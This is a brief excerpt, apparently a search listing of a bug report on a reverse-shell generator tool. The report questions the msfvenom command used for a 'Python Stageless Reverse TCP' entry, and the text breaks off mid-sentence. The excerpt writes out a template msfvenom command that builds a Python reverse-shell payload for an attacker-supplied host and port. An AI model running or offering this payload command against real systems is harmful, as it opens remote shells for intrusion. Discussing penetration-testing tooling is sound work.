Vu0r1
Results
1
issues of
Vu0r1
For msfvenom, the command for "Python Stageless Reverse TCP" is : `"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py",` this commande make a "shell.py" but cmd/unix/... is design...